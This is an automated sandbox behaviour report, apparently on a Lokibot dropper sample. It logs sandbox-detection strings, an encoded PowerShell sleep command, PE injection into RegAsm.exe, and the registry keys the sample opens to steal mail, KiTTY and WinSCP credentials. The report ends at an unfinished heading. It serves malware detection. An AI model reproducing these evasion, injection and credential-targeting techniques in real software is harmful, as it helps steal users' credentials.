Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOGPFAULTERRORBOX

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 1768	Thread sleep count: 199 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 244	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe TID: 5736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5800	Thread sleep count: 7238 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4652	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3348	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7238
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8921

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 60000

Source: powershell.exe, 00000001.00000002.412512179.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.412512179.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.530606213.0000000006A10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.516579808.0000000001529000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 415000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4A0000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 967008

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: Base64 decoded start-sleep -seconds 20

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal ftp login credentials

